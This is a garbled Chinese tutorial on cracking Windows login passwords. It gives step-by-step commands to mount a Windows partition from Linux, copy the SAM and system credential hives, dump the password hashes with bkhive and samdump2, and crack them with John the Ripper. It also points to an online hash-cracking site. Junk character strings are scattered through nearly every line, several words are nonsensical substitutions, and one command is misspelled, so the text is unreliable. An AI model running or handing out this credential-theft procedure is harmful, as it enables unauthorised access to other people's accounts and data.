用linux启动,并挂载Windows的系统分区把c:\windows\system32\config\目录下的SAM和system复制出来
' L1 Z% E7 x8 ~8 H8 P( `& Y" a 也可以用WINPE,DOS指导盘,都可以的,只要把SAM和system复制出来就行
- ^' i/ ~" ^7 z+ p2 q0 M 起头破解:
* n4 @" ^0 e. | bkhive system keys ——生成keys文件
+ L% }: u2 v( K2 V3 x3 a samdump2 SAM keys > hashes ——用SAM和keys生成hashes
% x+ h! A! J7 N$ Q1 N$ c+ | P% d john hashes ——跑hashes2 N- x) w. U0 u% B
友情提醒:* T" B$ I' |6 ~" z
可以直接访谒 http://www.objectif-securite.ch/en/products.php 在线发芽hash
. d8 o5 k( ~$ m2 D9 Z7 b c- u 此刻没有在linux下,改天上图,下面我文字描述一下. R6 K4 ]! v7 t& X: C3 `" m' u
mount -t ntfs /dev/hda1 /mnt/windows. t/ D% i3 s5 f' r; f2 p1 K
mkdir /home/young001/sam
$ G/ L2 U, Q1 _! I3 c cp /mnt/windows/WINDOWS\system32\config/SAM /home/young001/sam! v9 V; Q9 Q6 [' [: v6 y& @
cp /mnt/windows/WINDOWS\system32\config/system /home/young001/sam) Q1 B% \* o* m! X5 Z
unount /mnt/windows
' B" V% B1 e5 l) m; p cd /home/young001/sam
# o/ |3 `7 ~6 K- y, Y: M1 _ bkhive system keys
% m3 Z% f0 h8 K( g9 R# i) e samdump2 SAM keys > hashes
7 h B9 m! c2 k# H john hashes ——跑hashes3 j3 q$ M* f4 N/ @& c7 w
这样密码揪出来了. [! W; {2 @2 x/ Q
此外加上一些提醒:, S+ W! o, R* V! o
好比administrator密码是123456,那么他会在最底下这么显示
' p) r" _3 r" J3 Q% d: k administrator:123456:500:e263f50a6a506be3d494d3d62b4dc666:::看起来有点像/etc/passwd的内容名目,如不美观那时没有看清嚣张密码就清屏了,或者linux认证,插手保藏!后来健忘已经破解了的密码,可以经由过程下面呼吁查看" A" v$ i0 n# {2 _5 b! k
john-1.7.2/run/john -show hashes有的时辰密码处有可能会显示几个问号,如下
! J) v# I: B1 w administrator:???456:500:e263f50a6a506be3d494d3d62b4dc666:::这个时辰可以经由过程5 m1 U6 S7 _( F2 a3 w+ ^
john-1.7.2/run/john -show hashes看看密码是否完整。 如不美观仍是不完整,那么可能密码没有完全破解完毕,可以加–restore 参数从原本基本上继续破解( x7 D) v, E$ Y
john-1.7.2/run/john ——restore hashes |